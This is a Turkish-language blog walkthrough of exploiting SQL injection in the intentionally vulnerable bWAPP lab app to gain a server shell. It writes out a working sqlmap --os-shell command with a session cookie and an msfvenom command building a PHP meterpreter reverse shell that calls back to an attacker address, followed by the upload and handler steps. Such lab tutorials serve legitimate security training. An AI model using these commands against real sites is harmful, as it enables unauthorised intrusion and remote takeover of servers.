SQL Injection Kullanarak Sqlmap ile Shell Yükleme

Bu yazıda SQL Injection kullanarak  Sqlmap ile shell yükleyerek sisteme sızacağız.Bunun için Kali Linux,Burpsuite,Sqlmap ve bWAPP (Web Açıklıkları Bulunan Sistem) i kullanacağım.

bWAPP ı https://sourceforge.net/projects/bwapp/ adresinden indirerek sanal makinanızda ayağa kaldırıp ip adresi ile tarayıcınız üzerinden erişebilirsiniz.Ulaştığınızda kullanıcı adı : bee şifresini : bug olarak girdiğinizde uygulamaya giriş yapacaksınız.Burada bir çok web uygulama açıklıkları bulunmakta.Biz sqli kullanarak shell yükleyeceğiz.

 

Burpsuite i açarak uygulamızıda açıyoruz ‘ işareti ile kontrol ettiğimizde resimdeki gibi sqli olduğuna dair bizi mutlu eden hatayla karşılaşıyoruz.Aynı zamanda burp ilede cookiemize ulaşabiliyoruz.

Daha sonra  sqlmap ile url ve cookie mizi aşağıdaki parametrelerle birlikte –os-shell ekleyerek çalıştırıyoruz.

sqlmap -u "http://192.168.237.135/bWAPP/sqli_1.php?title=%C4%B1ronman&action=search" --cookie="security_level=0; PHPSESSID=4e4cf5609dfa54a19f3ee164c8d21f75" --os-shell

Sqlmap komutumuzu çalıştırdığımızda bize yukarıdaki gibi hedef sistemin dilini soruyor bu yazılım için php yani 4 diyerek devam ediyoruz.

Daha sonra dosyamızın nereye yükleneceğini soruyor burada 1 i seçerek devam ediyoruz.

Daha sonra dosyamızın yüklendiği adresleri yukarıda gördüğünüz gibi göstermekte.

192.168.237.135/tmpuidmm.php adresine gittiğimizde  shellimizi yükleyebileceğimiz bir sayfa gelmekte.

Buraya kendi shelliniz varsa onuda yükleyebilirsiniz yada msfvenom ile oluşturabilirsiniz.

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.237.128 LPORT=4444 -f raw > shell.php

Oluşturduğumuz shell.php yi sisteme yüklüyoruz.

Gördüğünüz gibi dosya yüklendi diyor.Buradan metasploit i açarak multi/handler ı çalıştıracağız.

 

Payloadımızı oluştururken girdiğimiz ip ve portları girerek multi/handler ı çalıştırıyoruz. Ve sonra tarayıcımızdan 192.168.237.135/shell.php yi açıyoruz.

Görüldüğü gibi meterpreter satırına düşmüş bulunmaktayız.

 

Ahmet Gürel

Cyber Security Researcher | Penetration Tester

Leave a Reply